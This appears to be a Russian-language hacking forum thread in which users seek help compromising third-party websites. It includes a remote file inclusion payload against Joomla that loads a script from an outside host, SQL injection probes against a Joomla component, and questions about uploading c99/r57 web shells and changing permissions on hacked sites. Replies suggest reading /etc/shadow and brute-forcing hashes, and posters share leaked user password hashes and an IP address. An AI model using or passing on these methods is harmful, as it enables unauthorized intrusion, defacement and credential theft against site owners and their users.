топором по серверу, может и ломонешь, если ты о обходе таймера - юзай прокси или плагин (уже 100 лет как есть) что бы сразу показывало ссылку на скачивание если ты про такие вещи как дефейс, от скажу: ололо
Можно ли узнать текущий пароль пользователя на сайте с движком DLE 8 версии??? доступ к базе вроде получил, скачал. зашифрованый пароль где то тут: 'e7e4806514adfd4171437dfd51f9e495', 'eric', 4, 0, 1, 3, '1241397821', '1240442341', '', 1, '', '', '', '', '', '', '', 0, 0, '', '', '', '', '194.186.188.36', 0, 0, ''), кто умеет отпишите в личку. или сюда способ.
Всеобщее здрасьте! Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии, старыыый вхлам, админы уже наверное с 2005 года там нет, один модератор бедный трудится как может, кароче форум уже загибается, много чего уже не работает попросту, скажите, вот возможно как-нибудь узнать пасс админа. Ну точнее, способов много, но раз форум старый, какой будет самый простой и недолгий способ?
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit: http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt Exploit: http://milw0rm.com/id.php?id=44
Уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии, имхо. ищи баги в компонентах.
Сижу ковыряю джумлу. Вродь как что то есть в модуле com_exitpoll. при запросе Code: index.php?option=com_exitpoll&task=results&id=1/**/order/**/by/**/1/* ошибок нет, слепой тоже вроди нету. при запросе Code: index.php?option=com_exitpoll&task=results&id=-1/**/order/**/by/**/1/* Выдаёт ошибку следующего вида Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id= далее поидее должен ити -1, но там кнопочка стоит и видать -1 просто невидно если это поможет вот этот эрор из исходника страницы Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id=<input class="button" type="button" value="Продолжить" onclick="window.history.go([B]-1[/B]);" /> Собсно подскажите чё с этим можно сделать ибо я в потерях.
Если у хостига стоит антивир, то это бесполезно... так как шел в любой форме воспринимать как троян... А вообще попробуй его подгрузить как картинку если есть такая возможность.. вот здесь искал?? http://damagelab.org/lofiversion/index.php?t=16780
Подскажите, пожалуйста, как можно поменять chmod на сайтах, взломанных с помощью shellа? Мало, кто сейчас ставит права 777, тем более на главный файл index.php. Шелл (c99 или r57) заливаю с помощью уязвимостей, но практически ничего не могу сделать из-за прав, а права не хотят меняться. Может есть какой способ их поменять, может с помощью другой утилиты или шелла?
Подскажите как залить шел в админке mambo 4.0.14 Stable. мамботы, компоненты, модули... обично такип образом заливал, но в данной версии такого вообще нет.
А ещё кроме этого есть какой-нибудь способ поменять права или узнать фтп логин и пароль? Хорошо и ещё...если я знаю логин и пароль к phpmyadmin, то с помощью этого как-нибудь рут-доступ можно поставить "гостю"?
Ищи через шелл файлы-логи на серваке может там чё нить нароешь, и ещё посмотри этот файл etc/shadow (если есть права).
Как сбрутить хеши из WordPress'a ? На hashcracking.info пишет: Тип хеша неопределен! Code: nastenka:$P$BeNvbpquWaaYZX6ABx9utk0w98Arms1 malina:$P$BMYngcoKyKOIClacElYGOQWPVJZoLN/ SergioXII:$P$BGu3dg5kiEabt9sPLXYocMn8FanUhT1
Через программы (passwordspro), брутом, у wordPress хеш + соль тебе в этот раздел _http://forum.antichat.ru/thread46700.html
Подскажите как залить шелл через админку PsychoStats 2.3.3? Если конечно вообще возможно это P.S. Через скуль-инъекцию не вариант - отсутствует file_priv.
